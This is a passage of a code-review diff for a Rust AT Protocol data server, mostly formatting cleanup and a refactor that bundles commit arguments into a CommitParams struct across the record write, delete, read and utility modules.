_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Commit block not found"}))).into_response(),
52
+
_ => {
53
+
return (
54
+
StatusCode::INTERNAL_SERVER_ERROR,
55
+
Json(json!({"error": "InternalError", "message": "Commit block not found"})),
56
+
)
57
+
.into_response();
58
+
}
54
59
};
55
60
let commit = match Commit::from_cbor(&commit_bytes) {
56
61
Ok(c) => c,
57
-
_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to parse commit"}))).into_response(),
62
+
_ => {
63
+
return (
64
+
StatusCode::INTERNAL_SERVER_ERROR,
65
+
Json(json!({"error": "InternalError", "message": "Failed to parse commit"})),
66
+
)
67
+
.into_response();
68
+
}
58
69
};
59
-
let mst = Mst::load(
60
-
Arc::new(tracking_store.clone()),
61
-
commit.data,
62
-
None,
63
-
);
70
+
let mst = Mst::load(Arc::new(tracking_store.clone()), commit.data, None);
64
71
let collection_nsid = match input.collection.parse::<Nsid>() {
65
72
Ok(n) => n,
66
-
Err(_) => return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidCollection"}))).into_response(),
73
+
Err(_) => {
74
+
return (
75
+
StatusCode::BAD_REQUEST,
76
+
Json(json!({"error": "InvalidCollection"})),
77
+
)
78
+
.into_response();
79
+
}
67
80
};
68
81
let key = format!("{}/{}", collection_nsid, input.rkey);
69
82
if let Some(swap_record_str) = &input.swap_record {
···
88
101
Ok(c) => c,
89
102
Err(e) => {
90
103
error!("Failed to persist MST: {:?}", e);
91
-
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to persist MST"}))).into_response();
104
+
return (
105
+
StatusCode::INTERNAL_SERVER_ERROR,
106
+
Json(json!({"error": "InternalError", "message": "Failed to persist MST"})),
107
+
)
108
+
.into_response();
92
109
}
93
110
};
94
-
let op = RecordOp::Delete { collection: input.collection, rkey: input.rkey, prev: prev_record_cid };
111
+
let op = RecordOp::Delete {
112
+
collection: input.collection,
113
+
rkey: input.rkey,
114
+
prev: prev_record_cid,
115
+
};
95
116
let mut relevant_blocks = std::collections::BTreeMap::new();
96
-
if let Err(_) = new_mst.blocks_for_path(&key, &mut relevant_blocks).await {
117
+
if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
97
118
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
98
119
}
99
-
if let Err(_) = mst.blocks_for_path(&key, &mut relevant_blocks).await {
120
+
if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
100
121
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
101
122
}
102
123
let mut written_cids = tracking_store.get_all_relevant_cids();
···
105
126
written_cids.push(*cid);
106
127
}
107
128
}
108
-
let written_cids_str = written_cids.iter().map(|c| c.to_string()).collect::<Vec<_>>();
109
-
if let Err(e) = commit_and_log(&state, &did, user_id, Some(current_root_cid), Some(commit.data), new_mst_root, vec![op], &written_cids_str).await {
110
-
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": e}))).into_response();
129
+
let written_cids_str = written_cids
130
+
.iter()
131
+
.map(|c| c.to_string())
132
+
.collect::<Vec<_>>();
133
+
if let Err(e) = commit_and_log(
134
+
&state,
135
+
CommitParams {
136
+
did: &did,
137
+
user_id,
138
+
current_root_cid: Some(current_root_cid),
139
+
prev_data_cid: Some(commit.data),
140
+
new_mst_root,
141
+
ops: vec![op],
142
+
blocks_cids: &written_cids_str,
143
+
},
144
+
)
145
+
.await
146
+
{
147
+
return (
148
+
StatusCode::INTERNAL_SERVER_ERROR,
149
+
Json(json!({"error": "InternalError", "message": e})),
150
+
)
151
+
.into_response();
111
152
};
112
153
(StatusCode::OK, Json(json!({}))).into_response()
113
154
}
+1
-1
src/api/repo/record/mod.rs
+1
-1
src/api/repo/record/mod.rs
+10
-9
src/api/repo/record/read.rs
+10
-9
src/api/repo/record/read.rs
···
71
71
.into_response();
72
72
}
73
73
};
74
-
if let Some(expected_cid) = &input.cid {
75
-
if &record_cid_str != expected_cid {
74
+
if let Some(expected_cid) = &input.cid
75
+
&& &record_cid_str != expected_cid {
76
76
return (
77
77
StatusCode::NOT_FOUND,
78
78
Json(json!({"error": "NotFound", "message": "Record CID mismatch"})),
79
79
)
80
80
.into_response();
81
81
}
82
-
}
83
82
let cid = match Cid::from_str(&record_cid_str) {
84
83
Ok(c) => c,
85
84
Err(_) => {
···
192
191
param_idx += 1;
193
192
}
194
193
if input.rkey_end.is_some() {
195
-
conditions.push(if param_idx == 3 { "rkey < $3" } else { "rkey < $4" });
194
+
conditions.push(if param_idx == 3 {
195
+
"rkey < $3"
196
+
} else {
197
+
"rkey < $4"
198
+
});
196
199
param_idx += 1;
197
200
}
198
201
let limit_idx = param_idx;
···
246
249
};
247
250
let mut records = Vec::new();
248
251
for (cid, block_opt) in cids.iter().zip(blocks.into_iter()) {
249
-
if let Some(block) = block_opt {
250
-
if let Some((rkey, cid_str)) = cid_to_rkey.get(cid) {
251
-
if let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block) {
252
+
if let Some(block) = block_opt
253
+
&& let Some((rkey, cid_str)) = cid_to_rkey.get(cid)
254
+
&& let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block) {
252
255
records.push(json!({
253
256
"uri": format!("at://{}/{}/{}", input.repo, input.collection, rkey),
254
257
"cid": cid_str,
255
258
"value": value
256
259
}));
257
260
}
258
-
}
259
-
}
260
261
}
261
262
Json(ListRecordsOutput {
262
263
cursor: last_rkey,
+150
-74
src/api/repo/record/utils.rs
+150
-74
src/api/repo/record/utils.rs
···
3
3
use cid::Cid;
4
4
use jacquard::types::{integer::LimitedU32, string::Tid};
5
5
use jacquard_repo::storage::BlockStore;
6
-
use k256::ecdsa::{signature::Signer, Signature, SigningKey};
6
+
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
7
7
use serde::Serialize;
8
8
use serde_json::json;
9
9
use uuid::Uuid;
···
71
71
}
72
72
73
73
pub enum RecordOp {
74
-
Create { collection: String, rkey: String, cid: Cid },
75
-
Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> },
76
-
Delete { collection: String, rkey: String, prev: Option<Cid> },
74
+
Create {
75
+
collection: String,
76
+
rkey: String,
77
+
cid: Cid,
78
+
},
79
+
Update {
80
+
collection: String,
81
+
rkey: String,
82
+
cid: Cid,
83
+
prev: Option<Cid>,
84
+
},
85
+
Delete {
86
+
collection: String,
87
+
rkey: String,
88
+
prev: Option<Cid>,
89
+
},
77
90
}
78
91
79
92
pub struct CommitResult {
···
81
94
pub rev: String,
82
95
}
83
96
97
+
pub struct CommitParams<'a> {
98
+
pub did: &'a str,
99
+
pub user_id: Uuid,
100
+
pub current_root_cid: Option<Cid>,
101
+
pub prev_data_cid: Option<Cid>,
102
+
pub new_mst_root: Cid,
103
+
pub ops: Vec<RecordOp>,
104
+
pub blocks_cids: &'a [String],
105
+
}
106
+
84
107
pub async fn commit_and_log(
85
108
state: &AppState,
86
-
did: &str,
87
-
user_id: Uuid,
88
-
current_root_cid: Option<Cid>,
89
-
prev_data_cid: Option<Cid>,
90
-
new_mst_root: Cid,
91
-
ops: Vec<RecordOp>,
92
-
blocks_cids: &[String],
109
+
params: CommitParams<'_>,
93
110
) -> Result<CommitResult, String> {
111
+
let CommitParams {
112
+
did,
113
+
user_id,
114
+
current_root_cid,
115
+
prev_data_cid,
116
+
new_mst_root,
117
+
ops,
118
+
blocks_cids,
119
+
} = params;
94
120
let key_row = sqlx::query!(
95
121
"SELECT key_bytes, encryption_version FROM user_keys WHERE user_id = $1",
96
122
user_id
···
100
126
.map_err(|e| format!("Failed to fetch signing key: {}", e))?;
101
127
let key_bytes = crate::config::decrypt_key(&key_row.key_bytes, key_row.encryption_version)
102
128
.map_err(|e| format!("Failed to decrypt signing key: {}", e))?;
103
-
let signing_key = SigningKey::from_slice(&key_bytes)
104
-
.map_err(|e| format!("Invalid signing key: {}", e))?;
129
+
let signing_key =
130
+
SigningKey::from_slice(&key_bytes).map_err(|e| format!("Invalid signing key: {}", e))?;
105
131
let rev = Tid::now(LimitedU32::MIN);
106
132
let rev_str = rev.to_string();
107
-
let (new_commit_bytes, _sig) = create_signed_commit(
108
-
did,
109
-
new_mst_root,
110
-
&rev_str,
111
-
current_root_cid,
112
-
&signing_key,
113
-
)?;
114
-
let new_root_cid = state.block_store.put(&new_commit_bytes).await
133
+
let (new_commit_bytes, _sig) =
134
+
create_signed_commit(did, new_mst_root, &rev_str, current_root_cid, &signing_key)?;
135
+
let new_root_cid = state
136
+
.block_store
137
+
.put(&new_commit_bytes)
138
+
.await
115
139
.map_err(|e| format!("Failed to save commit block: {:?}", e))?;
116
-
let mut tx = state.db.begin().await
140
+
let mut tx = state
141
+
.db
142
+
.begin()
143
+
.await
117
144
.map_err(|e| format!("Failed to begin transaction: {}", e))?;
118
145
let lock_result = sqlx::query!(
119
146
"SELECT repo_root_cid FROM repos WHERE user_id = $1 FOR UPDATE NOWAIT",
···
123
150
.await;
124
151
match lock_result {
125
152
Err(e) => {
126
-
if let Some(db_err) = e.as_database_error() {
127
-
if db_err.code().as_deref() == Some("55P03") {
128
-
return Err("ConcurrentModification: Another request is modifying this repo".to_string());
153
+
if let Some(db_err) = e.as_database_error()
154
+
&& db_err.code().as_deref() == Some("55P03") {
155
+
return Err(
156
+
"ConcurrentModification: Another request is modifying this repo"
157
+
.to_string(),
158
+
);
129
159
}
130
-
}
131
160
return Err(format!("Failed to acquire repo lock: {}", e));
132
161
}
133
162
Ok(Some(row)) => {
134
-
if let Some(expected_root) = ¤t_root_cid {
135
-
if row.repo_root_cid != expected_root.to_string() {
136
-
return Err("ConcurrentModification: Repo has been modified since last read".to_string());
163
+
if let Some(expected_root) = ¤t_root_cid
164
+
&& row.repo_root_cid != expected_root.to_string() {
165
+
return Err(
166
+
"ConcurrentModification: Repo has been modified since last read"
167
+
.to_string(),
168
+
);
137
169
}
138
-
}
139
170
}
140
171
Ok(None) => {
141
172
return Err("Repo not found".to_string());
142
173
}
143
174
}
144
-
sqlx::query!("UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", new_root_cid.to_string(), user_id)
145
-
.execute(&mut *tx)
146
-
.await
147
-
.map_err(|e| format!("DB Error (repos): {}", e))?;
175
+
sqlx::query!(
176
+
"UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2",
177
+
new_root_cid.to_string(),
178
+
user_id
179
+
)
180
+
.execute(&mut *tx)
181
+
.await
182
+
.map_err(|e| format!("DB Error (repos): {}", e))?;
148
183
let mut upsert_collections: Vec<String> = Vec::new();
149
184
let mut upsert_rkeys: Vec<String> = Vec::new();
150
185
let mut upsert_cids: Vec<String> = Vec::new();
···
152
187
let mut delete_rkeys: Vec<String> = Vec::new();
153
188
for op in &ops {
154
189
match op {
155
-
RecordOp::Create { collection, rkey, cid } | RecordOp::Update { collection, rkey, cid, .. } => {
190
+
RecordOp::Create {
191
+
collection,
192
+
rkey,
193
+
cid,
194
+
}
195
+
| RecordOp::Update {
196
+
collection,
197
+
rkey,
198
+
cid,
199
+
..
200
+
} => {
156
201
upsert_collections.push(collection.clone());
157
202
upsert_rkeys.push(rkey.clone());
158
203
upsert_cids.push(cid.to_string());
159
204
}
160
-
RecordOp::Delete { collection, rkey, .. } => {
205
+
RecordOp::Delete {
206
+
collection, rkey, ..
207
+
} => {
161
208
delete_collections.push(collection.clone());
162
209
delete_rkeys.push(rkey.clone());
163
210
}
···
197
244
.await
198
245
.map_err(|e| format!("DB Error (records batch delete): {}", e))?;
199
246
}
200
-
let ops_json = ops.iter().map(|op| {
201
-
match op {
202
-
RecordOp::Create { collection, rkey, cid } => json!({
247
+
let ops_json = ops
248
+
.iter()
249
+
.map(|op| match op {
250
+
RecordOp::Create {
251
+
collection,
252
+
rkey,
253
+
cid,
254
+
} => json!({
203
255
"action": "create",
204
256
"path": format!("{}/{}", collection, rkey),
205
257
"cid": cid.to_string()
206
258
}),
207
-
RecordOp::Update { collection, rkey, cid, prev } => {
259
+
RecordOp::Update {
260
+
collection,
261
+
rkey,
262
+
cid,
263
+
prev,
264
+
} => {
208
265
let mut obj = json!({
209
266
"action": "update",
210
267
"path": format!("{}/{}", collection, rkey),
···
214
271
obj["prev"] = json!(prev_cid.to_string());
215
272
}
216
273
obj
217
-
},
218
-
RecordOp::Delete { collection, rkey, prev } => {
274
+
}
275
+
RecordOp::Delete {
276
+
collection,
277
+
rkey,
278
+
prev,
279
+
} => {
219
280
let mut obj = json!({
220
281
"action": "delete",
221
282
"path": format!("{}/{}", collection, rkey),
···
225
286
obj["prev"] = json!(prev_cid.to_string());
226
287
}
227
288
obj
228
-
},
229
-
}
230
-
}).collect::<Vec<_>>();
289
+
}
290
+
})
291
+
.collect::<Vec<_>>();
231
292
let event_type = "commit";
232
293
let prev_cid_str = current_root_cid.map(|c| c.to_string());
233
294
let prev_data_cid_str = prev_data_cid.map(|c| c.to_string());
···
249
310
.fetch_one(&mut *tx)
250
311
.await
251
312
.map_err(|e| format!("DB Error (repo_seq): {}", e))?;
252
-
sqlx::query(
253
-
&format!("NOTIFY repo_updates, '{}'", seq_row.seq)
254
-
)
255
-
.execute(&mut *tx)
256
-
.await
257
-
.map_err(|e| format!("DB Error (notify): {}", e))?;
258
-
tx.commit().await
313
+
sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq))
314
+
.execute(&mut *tx)
315
+
.await
316
+
.map_err(|e| format!("DB Error (notify): {}", e))?;
317
+
tx.commit()
318
+
.await
259
319
.map_err(|e| format!("Failed to commit transaction: {}", e))?;
260
320
let _ = sequence_sync_event(state, did, &new_root_cid.to_string()).await;
261
321
Ok(CommitResult {
···
278
338
.await
279
339
.map_err(|e| format!("DB error: {}", e))?
280
340
.ok_or_else(|| "User not found".to_string())?;
281
-
let root_cid_str: String =
282
-
sqlx::query_scalar!("SELECT repo_root_cid FROM repos WHERE user_id = $1", user_id)
283
-
.fetch_optional(&state.db)
284
-
.await
285
-
.map_err(|e| format!("DB error: {}", e))?
286
-
.ok_or_else(|| "Repo not found".to_string())?;
287
-
let current_root_cid = Cid::from_str(&root_cid_str)
288
-
.map_err(|_| "Invalid repo root CID".to_string())?;
341
+
let root_cid_str: String = sqlx::query_scalar!(
342
+
"SELECT repo_root_cid FROM repos WHERE user_id = $1",
343
+
user_id
344
+
)
345
+
.fetch_optional(&state.db)
346
+
.await
347
+
.map_err(|e| format!("DB error: {}", e))?
348
+
.ok_or_else(|| "Repo not found".to_string())?;
349
+
let current_root_cid =
350
+
Cid::from_str(&root_cid_str).map_err(|_| "Invalid repo root CID".to_string())?;
289
351
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
290
-
let commit_bytes = tracking_store.get(¤t_root_cid).await
352
+
let commit_bytes = tracking_store
353
+
.get(¤t_root_cid)
354
+
.await
291
355
.map_err(|e| format!("Failed to fetch commit: {:?}", e))?
292
356
.ok_or_else(|| "Commit block not found".to_string())?;
293
357
let commit = jacquard_repo::commit::Commit::from_cbor(&commit_bytes)
···
296
360
let mut record_bytes = Vec::new();
297
361
serde_ipld_dagcbor::to_writer(&mut record_bytes, record)
298
362
.map_err(|e| format!("Failed to serialize record: {:?}", e))?;
299
-
let record_cid = tracking_store.put(&record_bytes).await
363
+
let record_cid = tracking_store
364
+
.put(&record_bytes)
365
+
.await
300
366
.map_err(|e| format!("Failed to save record block: {:?}", e))?;
301
367
let key = format!("{}/{}", collection, rkey);
302
-
let new_mst = mst.add(&key, record_cid).await
368
+
let new_mst = mst
369
+
.add(&key, record_cid)
370
+
.await
303
371
.map_err(|e| format!("Failed to add to MST: {:?}", e))?;
304
-
let new_mst_root = new_mst.persist().await
372
+
let new_mst_root = new_mst
373
+
.persist()
374
+
.await
305
375
.map_err(|e| format!("Failed to persist MST: {:?}", e))?;
306
376
let op = RecordOp::Create {
307
377
collection: collection.to_string(),
···
309
379
cid: record_cid,
310
380
};
311
381
let mut relevant_blocks = std::collections::BTreeMap::new();
312
-
new_mst.blocks_for_path(&key, &mut relevant_blocks).await
382
+
new_mst
383
+
.blocks_for_path(&key, &mut relevant_blocks)
384
+
.await
313
385
.map_err(|e| format!("Failed to get new MST blocks for path: {:?}", e))?;
314
-
mst.blocks_for_path(&key, &mut relevant_blocks).await
386
+
mst.blocks_for_path(&key, &mut relevant_blocks)
387
+
.await
315
388
.map_err(|e| format!("Failed to get old MST blocks for path: {:?}", e))?;
316
389
relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
317
390
let mut written_cids = tracking_store.get_all_relevant_cids();
···
323
396
let written_cids_str: Vec<String> = written_cids.iter().map(|c| c.to_string()).collect();
324
397
let result = commit_and_log(
325
398
state,
326
-
did,
327
-
user_id,
328
-
Some(current_root_cid),
329
-
Some(commit.data),
330
-
new_mst_root,
331
-
vec![op],
332
-
&written_cids_str,
333
-
).await?;
399
+
CommitParams {
400
+
did,
401
+
user_id,
402
+
current_root_cid: Some(current_root_cid),
403
+
prev_data_cid: Some(commit.data),
404
+
new_mst_root,
405
+
ops: vec![op],
406
+
blocks_cids: &written_cids_str,
407
+
},
408
+
)
409
+
.await?;
334
410
let uri = format!("at://{}/{}/{}", did, collection, rkey);
335
411
Ok((uri, result.commit_cid))
336
412
}
+14
-14
src/api/repo/record/validation.rs
+14
-14
src/api/repo/record/validation.rs
···
1
1
use crate::validation::{RecordValidator, ValidationError};
2
2
use axum::{
3
+
Json,
3
4
http::StatusCode,
4
5
response::{IntoResponse, Response},
5
-
Json,
6
6
};
7
7
use serde_json::json;
8
8
9
-
pub fn validate_record(record: &serde_json::Value, collection: &str) -> Result<(), Response> {
9
+
pub fn validate_record(record: &serde_json::Value, collection: &str) -> Result<(), Box<Response>> {
10
10
let validator = RecordValidator::new();
11
11
match validator.validate(record, collection) {
12
12
Ok(_) => Ok(()),
13
-
Err(ValidationError::MissingType) => Err((
13
+
Err(ValidationError::MissingType) => Err(Box::new((
14
14
StatusCode::BAD_REQUEST,
15
15
Json(json!({"error": "InvalidRecord", "message": "Record must have a $type field"})),
16
-
).into_response()),
17
-
Err(ValidationError::TypeMismatch { expected, actual }) => Err((
16
+
).into_response())),
17
+
Err(ValidationError::TypeMismatch { expected, actual }) => Err(Box::new((
18
18
StatusCode::BAD_REQUEST,
19
19
Json(json!({"error": "InvalidRecord", "message": format!("Record $type '{}' does not match collection '{}'", actual, expected)})),
20
-
).into_response()),
21
-
Err(ValidationError::MissingField(field)) => Err((
20
+
).into_response())),
21
+
Err(ValidationError::MissingField(field)) => Err(Box::new((
22
22
StatusCode::BAD_REQUEST,
23
23
Json(json!({"error": "InvalidRecord", "message": format!("Missing required field: {}", field)})),
24
-
).into_response()),
25
-
Err(ValidationError::InvalidField { path, message }) => Err((
24
+
).into_response())),
25
+
Err(ValidationError::InvalidField { path, message }) => Err(Box::new((
26
26
StatusCode::BAD_REQUEST,
27
27
Json(json!({"error": "InvalidRecord", "message": format!("Invalid field '{}': {}", path, message)})),
28
-
).into_response()),
29
-
Err(ValidationError::InvalidDatetime { path }) => Err((
28
+
).into_response())),
29
+
Err(ValidationError::InvalidDatetime { path }) => Err(Box::new((
30
30
StatusCode::BAD_REQUEST,
31
31
Json(json!({"error": "InvalidRecord", "message": format!("Invalid datetime format at '{}'", path)})),
32
-
).into_response()),
33
-
Err(e) => Err((
32
+
).into_response())),
33
+
Err(e) => Err(Box::new((
34
34
StatusCode::BAD_REQUEST,
35
35
Json(json!({"error": "InvalidRecord", "message": e.to_string()})),
36
-
).into_response()),
36
+
).into_response())),
37
37
}
38
38
}
+243
-85
src/api/repo/record/write.rs
+243
-85
src/api/repo/record/write.rs
···
1
1
use super::validation::validate_record;
2
-
use crate::api::repo::record::utils::{commit_and_log, RecordOp};
2
+
use crate::api::repo::record::utils::{CommitParams, RecordOp, commit_and_log};
3
3
use crate::repo::tracking::TrackingBlockStore;
4
4
use crate::state::AppState;
5
5
use axum::{
6
+
Json,
6
7
extract::State,
7
8
http::{HeaderMap, StatusCode},
8
9
response::{IntoResponse, Response},
9
-
Json,
10
10
};
11
11
use cid::Cid;
12
-
use jacquard::types::{integer::LimitedU32, string::{Nsid, Tid}};
12
+
use jacquard::types::{
13
+
integer::LimitedU32,
14
+
string::{Nsid, Tid},
15
+
};
13
16
use jacquard_repo::{commit::Commit, mst::Mst, storage::BlockStore};
14
17
use serde::{Deserialize, Serialize};
15
18
use serde_json::json;
···
19
22
use tracing::error;
20
23
use uuid::Uuid;
21
24
22
-
pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> {
25
+
pub async fn has_verified_notification_channel(
26
+
db: &PgPool,
27
+
did: &str,
28
+
) -> Result<bool, sqlx::Error> {
23
29
let row = sqlx::query(
24
30
r#"
25
31
SELECT
···
29
35
signal_verified
30
36
FROM users
31
37
WHERE did = $1
32
-
"#
38
+
"#,
33
39
)
34
40
.bind(did)
35
41
.fetch_optional(db)
···
52
58
repo_did: &str,
53
59
) -> Result<(String, Uuid, Cid), Response> {
54
60
let token = crate::auth::extract_bearer_token_from_header(
55
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
56
-
).ok_or_else(|| {
61
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
62
+
)
63
+
.ok_or_else(|| {
57
64
(
58
65
StatusCode::UNAUTHORIZED,
59
66
Json(json!({"error": "AuthenticationRequired"})),
···
102
109
.await
103
110
.map_err(|e| {
104
111
error!("DB error fetching user: {}", e);
105
-
(StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError"}))).into_response()
112
+
(
113
+
StatusCode::INTERNAL_SERVER_ERROR,
114
+
Json(json!({"error": "InternalError"})),
115
+
)
116
+
.into_response()
106
117
})?
107
118
.ok_or_else(|| {
108
119
(
···
111
122
)
112
123
.into_response()
113
124
})?;
114
-
let root_cid_str: String =
115
-
sqlx::query_scalar!("SELECT repo_root_cid FROM repos WHERE user_id = $1", user_id)
116
-
.fetch_optional(&state.db)
117
-
.await
118
-
.map_err(|e| {
119
-
error!("DB error fetching repo root: {}", e);
120
-
(StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError"}))).into_response()
121
-
})?
122
-
.ok_or_else(|| {
123
-
(
124
-
StatusCode::INTERNAL_SERVER_ERROR,
125
-
Json(json!({"error": "InternalError", "message": "Repo root not found"})),
126
-
)
127
-
.into_response()
128
-
})?;
125
+
let root_cid_str: String = sqlx::query_scalar!(
126
+
"SELECT repo_root_cid FROM repos WHERE user_id = $1",
127
+
user_id
128
+
)
129
+
.fetch_optional(&state.db)
130
+
.await
131
+
.map_err(|e| {
132
+
error!("DB error fetching repo root: {}", e);
133
+
(
134
+
StatusCode::INTERNAL_SERVER_ERROR,
135
+
Json(json!({"error": "InternalError"})),
136
+
)
137
+
.into_response()
138
+
})?
139
+
.ok_or_else(|| {
140
+
(
141
+
StatusCode::INTERNAL_SERVER_ERROR,
142
+
Json(json!({"error": "InternalError", "message": "Repo root not found"})),
143
+
)
144
+
.into_response()
145
+
})?;
129
146
let current_root_cid = Cid::from_str(&root_cid_str).map_err(|_| {
130
147
(
131
148
StatusCode::INTERNAL_SERVER_ERROR,
···
162
179
Ok(res) => res,
163
180
Err(err_res) => return err_res,
164
181
};
165
-
if let Some(swap_commit) = &input.swap_commit {
166
-
if Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
182
+
if let Some(swap_commit) = &input.swap_commit
183
+
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
167
184
return (
168
185
StatusCode::CONFLICT,
169
186
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
170
187
)
171
188
.into_response();
172
189
}
173
-
}
174
190
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
175
191
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
176
192
Ok(Some(b)) => b,
177
-
_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Commit block not found"}))).into_response(),
193
+
_ => {
194
+
return (
195
+
StatusCode::INTERNAL_SERVER_ERROR,
196
+
Json(json!({"error": "InternalError", "message": "Commit block not found"})),
197
+
)
198
+
.into_response();
199
+
}
178
200
};
179
201
let commit = match Commit::from_cbor(&commit_bytes) {
180
202
Ok(c) => c,
181
-
_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to parse commit"}))).into_response(),
203
+
_ => {
204
+
return (
205
+
StatusCode::INTERNAL_SERVER_ERROR,
206
+
Json(json!({"error": "InternalError", "message": "Failed to parse commit"})),
207
+
)
208
+
.into_response();
209
+
}
182
210
};
183
-
let mst = Mst::load(
184
-
Arc::new(tracking_store.clone()),
185
-
commit.data,
186
-
None,
187
-
);
211
+
let mst = Mst::load(Arc::new(tracking_store.clone()), commit.data, None);
188
212
let collection_nsid = match input.collection.parse::<Nsid>() {
189
213
Ok(n) => n,
190
-
Err(_) => return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidCollection"}))).into_response(),
214
+
Err(_) => {
215
+
return (
216
+
StatusCode::BAD_REQUEST,
217
+
Json(json!({"error": "InvalidCollection"})),
218
+
)
219
+
.into_response();
220
+
}
191
221
};
192
-
if input.validate.unwrap_or(true) {
193
-
if let Err(err_response) = validate_record(&input.record, &input.collection) {
194
-
return err_response;
222
+
if input.validate.unwrap_or(true)
223
+
&& let Err(err_response) = validate_record(&input.record, &input.collection) {
224
+
return *err_response;
195
225
}
196
-
}
197
-
let rkey = input.rkey.unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string());
226
+
let rkey = input
227
+
.rkey
228
+
.unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string());
198
229
let mut record_bytes = Vec::new();
199
230
if serde_ipld_dagcbor::to_writer(&mut record_bytes, &input.record).is_err() {
200
-
return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response();
231
+
return (
232
+
StatusCode::BAD_REQUEST,
233
+
Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"})),
234
+
)
235
+
.into_response();
201
236
}
202
237
let record_cid = match tracking_store.put(&record_bytes).await {
203
238
Ok(c) => c,
204
-
_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to save record block"}))).into_response(),
239
+
_ => {
240
+
return (
241
+
StatusCode::INTERNAL_SERVER_ERROR,
242
+
Json(json!({"error": "InternalError", "message": "Failed to save record block"})),
243
+
)
244
+
.into_response();
245
+
}
205
246
};
206
247
let key = format!("{}/{}", collection_nsid, rkey);
207
248
let new_mst = match mst.add(&key, record_cid).await {
208
249
Ok(m) => m,
209
-
_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to add to MST"}))).into_response(),
250
+
_ => {
251
+
return (
252
+
StatusCode::INTERNAL_SERVER_ERROR,
253
+
Json(json!({"error": "InternalError", "message": "Failed to add to MST"})),
254
+
)
255
+
.into_response();
256
+
}
210
257
};
211
258
let new_mst_root = match new_mst.persist().await {
212
259
Ok(c) => c,
213
-
_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to persist MST"}))).into_response(),
260
+
_ => {
261
+
return (
262
+
StatusCode::INTERNAL_SERVER_ERROR,
263
+
Json(json!({"error": "InternalError", "message": "Failed to persist MST"})),
264
+
)
265
+
.into_response();
266
+
}
267
+
};
268
+
let op = RecordOp::Create {
269
+
collection: input.collection.clone(),
270
+
rkey: rkey.clone(),
271
+
cid: record_cid,
214
272
};
215
-
let op = RecordOp::Create { collection: input.collection.clone(), rkey: rkey.clone(), cid: record_cid };
216
273
let mut relevant_blocks = std::collections::BTreeMap::new();
217
-
if let Err(_) = new_mst.blocks_for_path(&key, &mut relevant_blocks).await {
274
+
if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
218
275
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
219
276
}
220
-
if let Err(_) = mst.blocks_for_path(&key, &mut relevant_blocks).await {
277
+
if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
221
278
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
222
279
}
223
280
relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
···
227
284
written_cids.push(*cid);
228
285
}
229
286
}
230
-
let written_cids_str = written_cids.iter().map(|c| c.to_string()).collect::<Vec<_>>();
231
-
if let Err(e) = commit_and_log(&state, &did, user_id, Some(current_root_cid), Some(commit.data), new_mst_root, vec![op], &written_cids_str).await {
232
-
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": e}))).into_response();
287
+
let written_cids_str = written_cids
288
+
.iter()
289
+
.map(|c| c.to_string())
290
+
.collect::<Vec<_>>();
291
+
if let Err(e) = commit_and_log(
292
+
&state,
293
+
CommitParams {
294
+
did: &did,
295
+
user_id,
296
+
current_root_cid: Some(current_root_cid),
297
+
prev_data_cid: Some(commit.data),
298
+
new_mst_root,
299
+
ops: vec![op],
300
+
blocks_cids: &written_cids_str,
301
+
},
302
+
)
303
+
.await
304
+
{
305
+
return (
306
+
StatusCode::INTERNAL_SERVER_ERROR,
307
+
Json(json!({"error": "InternalError", "message": e})),
308
+
)
309
+
.into_response();
233
310
};
234
-
(StatusCode::OK, Json(CreateRecordOutput {
235
-
